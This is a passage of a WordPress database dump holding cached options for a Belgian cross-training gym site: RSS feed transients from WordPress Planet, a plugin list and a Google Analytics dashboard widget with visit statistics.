documents.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://a9.com/-/spec/opensearch/1.1/\";a:3:{s:12:\"totalResults\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:10:\"startIndex\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:12:\"itemsPerPage\";a:1:{i:0;a:5:{s:4:\"data\";s:2:\"10\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";a:10:{s:12:\"content-type\";s:28:\"text/xml; charset=ISO-8859-1\";s:4:\"date\";s:29:\"Sun, 03 Nov 2013 08:53:21 GMT\";s:7:\"expires\";s:2:\"-1\";s:13:\"cache-control\";s:18:\"private, max-age=0\";s:10:\"set-cookie\";a:2:{i:0;s:143:\"PREF=ID=df37ed11f52917e7:FF=0:TM=1383468801:LM=1383468801:S=tbvobcqxXodNGzm3; expires=Tue, 03-Nov-2015 08:53:21 GMT; path=/; domain=.google.com\";i:1;s:212:\"NID=67=XJbmnw72YXyFKAgC20VuAon388EkVuncQsJaw_5JVAmLmSBBTn4JO32Wo9w6fHIuTC8idx3T69wQfp2769QwBIjZm3FWkNeLJnOEZYGZBp7auyUmAThgQIXhobpxg9qO; expires=Mon, 05-May-2014 08:53:21 GMT; path=/; domain=.google.com; HttpOnly\";}s:3:\"p3p\";s:122:\"CP=\"This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info.\"\";s:6:\"server\";s:3:\"gws\";s:16:\"x-xss-protection\";s:13:\"1; mode=block\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:18:\"alternate-protocol\";s:7:\"80:quic\";}s:5:\"build\";s:14:\"20131101083921\";}', 'no'),
(3246, '_transient_timeout_feed_mod_867bd5c64f85878d03a060509cd2f92c', '1383512003', 'no'),
(3247, '_transient_feed_mod_867bd5c64f85878d03a060509cd2f92c', '1383468803', 'no'),
(3248, '_transient_timeout_dash_aa95765b5cc111c56d5993d476b1c2f0', '1383512003', 'no'),
(3249, '_transient_dash_aa95765b5cc111c56d5993d476b1c2f0', '<div class=\"rss-widget\"><ul><li><a class=\'rsswidget\' href=\'http://wordpress.tv/2013/11/02/steve-wilkison-an-introduction-to-creating-custom-wordpress-themes/\' title=\'    \'>WordPress.tv: Steve Wilkison: An Introduction To Creating Custom WordPress Themes</a></li><li><a class=\'rsswidget\' href=\'http://feedproxy.google.com/~r/WordpressTavern/~3/LAGCARUPZ1c/wpweekly-episode-126-catching-up-with-cory-miller-from-ithemes\' title=\' In this episode, we caught up with Cory Miller of iThemes.com to walk down memory lane starting with 2008. The year he launched the company. Then we progressed into the future and visited various milestones along the way such as the release of the Flexx theme, Builder, PluginBuddy, Backup Buddy, Webdesign.com, and iThemes Exchange. I loved talking to Cory about the early years of WordPress themes. We also covered the headlines of the week.  Stories Discussed: WordPress 3.7.1 Released Akismet Celebrates Huge Spam Blocking Milestone WordPress 3.8 Development Heats Up With Discussion of New Core Features WPWeekly Meta: Next Episode: Friday, November 8th 3 P.M. Eastern Subscribe To WPWeekly Via Itunes: Click here to subscribe Subscribe To WPWeekly Via RSS: Click here to subscribe Subscribe To WPWeekly Via Stitcher Radio: Click here to subscribe Listen To Episode #126:  \'>WPTavern: WPWeekly Episode 126 – Catching Up With Cory Miller From iThemes</a></li><li><a class=\'rsswidget\' href=\'http://wordpress.tv/2013/11/02/justin-sainton-hacking-your-business-business-workflow-for-developers/\' title=\'    \'>WordPress.tv: Justin Sainton: Hacking Your Business: Business Workflow For Developers</a></li><li><a class=\'rsswidget\' href=\'http://ma.tt/2013/11/automattic-on-google-maps/\' title=\'You can now view the inside of Automattic’s office on Google Maps street view and walk around inside. To get downstairs go by the stairs and press the back arrow, a bit unintuitive but gets you to the main floor. Check out the custom shuffleboard upstairs.\'>Matt: Automattic on Google Maps</a></li><li><a class=\'rsswidget\' href=\'http://ma.tt/2013/11/ultra-high-frequency-sound-malware/\' title=\'The story around badBIOS, the mysterious Mac and PC malware that jumps airgaps, is fascinating and surprising. The capabilities of sophisticated attackers right now vastly outstrip the defenses of any computer user or company. The news that the NSA had broken into the networks of Google and Yahoo, unfortunately, wasn’t surprising given Google’s move to encrypt traffic between datacenters early in September.\'>Matt: Ultra-high Frequency Sound Malware</a></li></ul></div>', 'no'),
(3334, '_transient_is_multi_author', '0', 'yes'),
(399, 'total_slider_slide_groups', 'a:1:{i:0;O:17:\"Total_Slide_Group\":5:{s:4:\"slug\";s:9:\"objectifs\";s:12:\"originalSlug\";s:9:\"objectifs\";s:4:\"name\";s:9:\"Objectifs\";s:16:\"templateLocation\";s:7:\"builtin\";s:8:\"template\";s:7:\"default\";}}', 'yes'),
(400, 'total_slider_general_options', 'a:2:{s:23:\"should_enqueue_template\";s:1:\"1\";s:26:\"should_show_tinymce_button\";s:1:\"1\";}', 'yes'),
(401, 'total_slider_dataformat_version', '1.1', 'yes'),
(3222, '_transient_timeout_dash_20494a3d90a6669585674ed0eb8dcd8f', '1383512001', 'no'),
(3221, '_transient_feed_mod_4725d5c1115324486aa3db40a3f9703a', '1383468801', 'no'),
(3238, '_transient_timeout_plugin_slugs', '1383555203', 'no'),
(3239, '_transient_plugin_slugs', 'a:13:{i:0;s:19:\"akismet/akismet.php\";i:1;s:35:\"clicface-trombi/clicface-trombi.php\";i:2;s:36:\"contact-form-7/wp-contact-form-7.php\";i:3;s:35:\"display-widgets/display-widgets.php\";i:4;s:25:\"easy-table/easy-table.php\";i:5;s:43:\"google-analyticator/google-analyticator.php\";i:6;s:9:\"hello.php\";i:7;s:19:\"piklist/piklist.php\";i:8;s:47:\"really-simple-captcha/really-simple-captcha.php\";i:9;s:29:\"seo-ultimate/seo-ultimate.php\";i:10;s:31:\"slideshow-manager/slideshow.php\";i:11;s:29:\"total-slider/total-slider.php\";i:12;s:37:\"widgets-on-pages/widgets_on_pages.php\";}', 'no'),
(3240, '_transient_timeout_ga_admin_dashboard_6.4.530', '1383490403', 'no'),
(3241, '_transient_ga_admin_dashboard_6.4.530', '<script type=\"text/javascript\">var datelabel = [[4, \"Oct. 07\"],[8, \"Oct. 11\"],[12, \"Oct. 15\"],[16, \"Oct. 19\"],[20, \"Oct. 23\"],[24, \"Oct. 27\"],[28, \"Oct. 31\"]];var d1 = [[1, 2],[2, 5],[3, 5],[4, 9],[5, 8],[6, 6],[7, 6],[8, 4],[9, 0],[10, 2],[11, 1],[12, 10],[13, 7],[14, 2],[15, 4],[16, 7],[17, 2],[18, 0],[19, 5],[20, 6],[21, 5],[22, 2],[23, 5],[24, 6],[25, 4],[26, 4],[27, 8],[28, 1],[29, 12],[30, 9]];var d2 = [\"Friday, Oct. 04, 2013\",\"Saturday, Oct. 05, 2013\",\"Sunday, Oct. 06, 2013\",\"Monday, Oct. 07, 2013\",\"Tuesday, Oct. 08, 2013\",\"Wednesday, Oct. 09, 2013\",\"Thursday, Oct. 10, 2013\",\"Friday, Oct. 11, 2013\",\"Saturday, Oct. 12, 2013\",\"Sunday, Oct. 13, 2013\",\"Monday, Oct. 14, 2013\",\"Tuesday, Oct. 15, 2013\",\"Wednesday, Oct. 16, 2013\",\"Thursday, Oct. 17, 2013\",\"Friday, Oct. 18, 2013\",\"Saturday, Oct. 19, 2013\",\"Sunday, Oct. 20, 2013\",\"Monday, Oct. 21, 2013\",\"Tuesday, Oct. 22, 2013\",\"Wednesday, Oct. 23, 2013\",\"Thursday, Oct. 24, 2013\",\"Friday, Oct. 25, 2013\",\"Saturday, Oct. 26, 2013\",\"Sunday, Oct. 27, 2013\",\"Monday, Oct. 28, 2013\",\"Tuesday, Oct. 29, 2013\",\"Wednesday, Oct. 30, 2013\",\"Thursday, Oct. 31, 2013\",\"Friday, Nov. 01, 2013\",\"Saturday, Nov. 02, 2013\"];</script><span class=\"ga_visits\" title=\"The most visits on a single day was 12. Yesterday there were 9 visits.\"></span><p style=\"font-style: italic; font-family: Georgia, \'Times New Roman\', \'Bitstream Charter\', Times, serif; color: #777; font-size: 13px;\">Site Usage</p>            <table width=\"100%\">\n                    <tr>\n                        <td width=\"\"><strong>147</strong></td>\n                        <td width=\"\">Visits</td>\n                                                    <td width=\"20%\"><strong>30.61%</strong></td>\n                                                <td width=\"30%\">Bounce Rate</td>\n                    </tr>\n                    <tr>\n                        <td><strong>741</strong></td>\n                        <td>Pageviews</td>\n                                                    <td><strong>00:06:28</strong></td>\n                                                <td>Avg. Time on Site</td>\n                    </tr>\n                    <tr>\n                                                    <td><strong>5.04</strong></td>\n                                                    <td>Pages/Visit</td>\n                                                    <td><strong>48.30%</strong></td>\n                            <td>% New Visits</td>\n                                            </tr>\n            </table>\n    <p style=\"font-style: italic; font-family: Georgia, \'Times New Roman\', \'Bitstream Charter\', Times, serif; color: #777; font-size: 13px;\">Top Pages</p><ol><li><a href=\"/les-seances/\">Cross Training Center - Les séances</a> - 127 Views</li><li><a href=\"/lequipe/\">Cross Training Center - L&#039;équipe</a> - 93 Views</li><li><a href=\"/le-cross-training/\">Cross Training Center - Le cross training</a> - 90 Views</li><li><a href=\"/notre-philosophie/\">Cross Training Center - Notre philosophie</a> - 78 Views</li><li><a href=\"/contact/\">Cross Training Center - Contact</a> - 45 Views</li></ol><table width=\"100%\"><tr><td width=\"50%\" valign=\"top\"><p style=\"font-style: italic; font-family: Georgia, \'Times New Roman\', \'Bitstream Charter\', Times, serif; color: #777; font-size: 13px;\">Top Referrers</p><ol><li><strong>facebook.com</strong> - 12 Visits</li><li><strong>www2.crosstrainingcenter.be</strong> - 4 Visits</li><li><strong>m.facebook.com</strong> - 2 Visits</li><li><strong>google.fr</strong> - 1 Visits</li></ol></td><td valign=\"top\"><p style=\"font-style: italic; font-family: Georgia, \'Times New Roman\', \'Bitstream Charter\', Times, serif; color: #777; font-size: 13px;\">Top Searches</p><ol><li><strong>(not provided)</strong> - 72 Visits</li><li><strong>cross training namur</strong> - 4 Visits</li><li><strong>cross training center namur</strong> - 2 Visits</li><li><strong>glfe consulting</strong> - 1 Visits</li></ol></td></tr></table>', 'no'),
(3242, '_transient_timeout_dash_de3249c4736ad3bd2cd29147c4a0d43e', '1383512003', 'no'),
(3243, '_transient_dash_de3249c4736ad3bd2cd29147c4a0d43e', '<h4>Most Popular</h4>\n<h5><a href=\'http://wordpress.org/plugins/captcha/\'>Captcha</a></h5>&nbsp;<span>(<a href=\'plugin-install.php?tab=plugin-information&amp;plugin=captcha&amp;_wpnonce=8becf11b3a&amp;TB_iframe=true&amp;width=600&amp;height=800\' class=\'thickbox\' title=\'Captcha\'>Install</a>)</span>\n<p>This plugin allows you to implement super security captcha form into web forms.</p>\n<h4>Newest Plugins</h4>\n<h5><a href=\'http://wordpress.org/plugins/cooked/\'>Cooked</a></h5>&nbsp;<span>(<a href=\'plugin-install.php?tab=plugin-information&amp;plugin=cooked&amp;_wpnonce=5f6fbc27e9&amp;TB_iframe=true&amp;width=600&amp;height=800\' class=\'thickbox\' title=\'Cooked\'>Install</a>)</span>\n<p>Cooking plugin that goes beyond just managing recipes. It allows the chef to detail the ingredients to be used as their own post type.</p>\n', 'no'),
(3244, '_transient_timeout_feed_867bd5c64f85878d03a060509cd2f92c', '1383512003', 'no');
INSERT INTO `www_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(3245, '_transient_feed_867bd5c64f85878d03a060509cd2f92c', 'a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:61:\"\n	\n	\n	\n	\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"WordPress Planet\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://planet.wordpress.org/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:2:\"en\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"WordPress Planet - http://planet.wordpress.org/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:50:{i:0;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:81:\"WordPress.tv: Steve Wilkison: An Introduction To Creating Custom WordPress Themes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wordpress.tv/?p=24424\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:98:\"http://wordpress.tv/2013/11/02/steve-wilkison-an-introduction-to-creating-custom-wordpress-themes/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:717:\"<div id=\"v-BSg1SHAM-1\" class=\"video-player\">\n</div><br />  <a rel=\"nofollow\" href=\"http://feeds.wordpress.com/1.0/gocomments/wptv.wordpress.com/24424/\"><img alt=\"\" border=\"0\" src=\"http://feeds.wordpress.com/1.0/comments/wptv.wordpress.com/24424/\" /></a> <img alt=\"\" border=\"0\" src=\"http://stats.wordpress.com/b.gif?host=wordpress.tv&blog=5089392&post=24424&subd=wptv&ref=&feed=1\" width=\"1\" height=\"1\" /><div><a href=\"http://wordpress.tv/2013/11/02/steve-wilkison-an-introduction-to-creating-custom-wordpress-themes/\"><img alt=\"Steve Wilkison: An Introduction To Creating Custom WordPress Themes\" src=\"http://videos.videopress.com/BSg1SHAM/video-1981a786d7_scruberthumbnail_0.jpg\" width=\"160\" height=\"120\" /></a></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 02 Nov 2013 23:44:50 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"WordPress.tv\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"WPTavern: WPWeekly Episode 126 – Catching Up With Cory Miller From iThemes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"http://www.wptavern.com/?p=10844\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:124:\"http://feedproxy.google.com/~r/WordpressTavern/~3/LAGCARUPZ1c/wpweekly-episode-126-catching-up-with-cory-miller-from-ithemes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2974:\"<p><a href=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/08/WordPressWeekly_albumart2.jpg\" rel=\"thumbnail\"><img src=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/08/WordPressWeekly_albumart2.jpg?resize=150%2C150\" alt=\"WordPress Weekly Cover Art\" class=\"alignright size-thumbnail wp-image-8715\" /></a> <span id=\"more-10844\"></span>In this episode, we caught up with Cory Miller of <a href=\"http://ithemes.com/\" title=\"http://ithemes.com/\">iThemes.com</a> to walk down memory lane starting with 2008. The year he launched the company. Then we progressed into the future and visited various milestones along the way such as the release of the <a href=\"http://ithemes.com/purchase/flexx-theme/\" title=\"http://ithemes.com/purchase/flexx-theme/\">Flexx theme</a>, <a href=\"http://www.wptavern.com/review-of-ithemes-builder-theme\" title=\"http://www.wptavern.com/review-of-ithemes-builder-theme\">Builder</a>, <a href=\"http://ithemes.com/find/plugins/\" title=\"http://ithemes.com/find/plugins/\">PluginBuddy</a>, <a href=\"http://www.wptavern.com/backup-buddy-is-a-home-run\" title=\"http://www.wptavern.com/backup-buddy-is-a-home-run\">Backup Buddy</a>, <a href=\"http://webdesign.com/\" title=\"http://webdesign.com/\">Webdesign.com</a>, and <a href=\"http://ithemes.com/exchange/\" title=\"http://ithemes.com/exchange/\">iThemes Exchange</a>. I loved talking to Cory about the early years of WordPress themes. We also covered the headlines of the week. <!--more--></p>\n<h2>Stories Discussed:</h2>\n<p><a href=\"http://www.wptavern.com/wordpress-3-7-1-a-historical-maintenance-release\" title=\"http://www.wptavern.com/wordpress-3-7-1-a-historical-maintenance-release\">WordPress 3.7.1 Released</a><br />\n<a href=\"http://www.wptavern.com/akismet-celebrates-huge-spam-blocking-milestone\" title=\"http://www.wptavern.com/akismet-celebrates-huge-spam-blocking-milestone\">Akismet Celebrates Huge Spam Blocking Milestone</a><br />\n<a href=\"http://www.wptavern.com/wordpress-3-8-development-heats-up-with-discussion-of-new-core-features\" title=\"http://www.wptavern.com/wordpress-3-8-development-heats-up-with-discussion-of-new-core-features\">WordPress 3.8 Development Heats Up With Discussion of New Core Features</a></p>\n<h2>WPWeekly Meta:</h2>\n<p><strong>Next Episode:</strong> Friday, November 8th 3 P.M. Eastern</p>\n<p><strong>Subscribe To WPWeekly Via Itunes: </strong><a href=\"https://itunes.apple.com/us/podcast/wordpress-weekly/id694849738\" target=\"_blank\">Click here to subscribe</a></p>\n<p><strong>Subscribe To WPWeekly Via RSS: </strong><a href=\"http://www.wptavern.com/feed/podcast\" target=\"_blank\">Click here to subscribe</a></p>\n<p><strong>Subscribe To WPWeekly Via Stitcher Radio: </strong><a href=\"http://www.stitcher.com/podcast/wordpress-weekly-podcast?refid=stpr\" target=\"_blank\">Click here to subscribe</a></p>\n<p><strong>Listen To Episode #126:</strong><br />\n</p>\n<img src=\"http://feeds.feedburner.com/~r/WordpressTavern/~4/LAGCARUPZ1c\" height=\"1\" width=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 02 Nov 2013 18:35:38 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"Jeffro\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:85:\"WordPress.tv: Justin Sainton: Hacking Your Business: Business Workflow For Developers\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wordpress.tv/?p=24548\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:101:\"http://wordpress.tv/2013/11/02/justin-sainton-hacking-your-business-business-workflow-for-developers/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:724:\"<div id=\"v-3auPLRWJ-1\" class=\"video-player\">\n</div><br />  <a rel=\"nofollow\" href=\"http://feeds.wordpress.com/1.0/gocomments/wptv.wordpress.com/24548/\"><img alt=\"\" border=\"0\" src=\"http://feeds.wordpress.com/1.0/comments/wptv.wordpress.com/24548/\" /></a> <img alt=\"\" border=\"0\" src=\"http://stats.wordpress.com/b.gif?host=wordpress.tv&blog=5089392&post=24548&subd=wptv&ref=&feed=1\" width=\"1\" height=\"1\" /><div><a href=\"http://wordpress.tv/2013/11/02/justin-sainton-hacking-your-business-business-workflow-for-developers/\"><img alt=\"Justin Sainton: Hacking Your Business: Business Workflow For Developers\" src=\"http://videos.videopress.com/3auPLRWJ/video-80686fa92c_scruberthumbnail_0.jpg\" width=\"160\" height=\"120\" /></a></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 02 Nov 2013 11:40:40 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"WordPress.tv\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Matt: Automattic on Google Maps\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=43156\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"http://ma.tt/2013/11/automattic-on-google-maps/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:343:\"<p>You can now view <a href=\"http://jkudish.com/2013/10/31/automattic-is-on-google-maps/\">the inside of Automattic&#8217;s office on Google Maps street view</a> and walk around inside. To get downstairs go by the stairs and press the back arrow, a bit unintuitive but gets you to the main floor. Check out the custom shuffleboard upstairs.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 02 Nov 2013 10:00:50 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Matt Mullenweg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"Matt: Ultra-high Frequency Sound Malware\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=43154\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"http://ma.tt/2013/11/ultra-high-frequency-sound-malware/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:985:\"<p>The story around <a href=\"http://arstechnica.com/security/2013/10/meet-badbios-the-mysterious-mac-and-pc-malware-that-jumps-airgaps/\">badBIOS, the mysterious Mac and PC malware that jumps airgaps</a>, is fascinating and surprising. The capabilities of sophisticated attackers right now vastly outstrip the defenses of any computer user or company. The <a href=\"http://www.washingtonpost.com/world/national-security/nsa-infiltrates-links-to-yahoo-google-data-centers-worldwide-snowden-documents-say/2013/10/30/e51d661e-4166-11e3-8b74-d89d714ca4dd_story.html?Post+generic=%3Ftid%3Dsm_twitter_washingtonpost\">news that the NSA had broken into the networks of Google and Yahoo</a>, unfortunately, wasn&#8217;t surprising given <a href=\"http://www.washingtonpost.com/business/technology/google-encrypts-data-amid-backlash-against-nsa-spying/2013/09/06/9acc3c20-1722-11e3-a2ec-b47e45e6f8ef_story.html\">Google&#8217;s move to encrypt traffic between datacenters</a> early in September.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 02 Nov 2013 00:37:50 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Matt 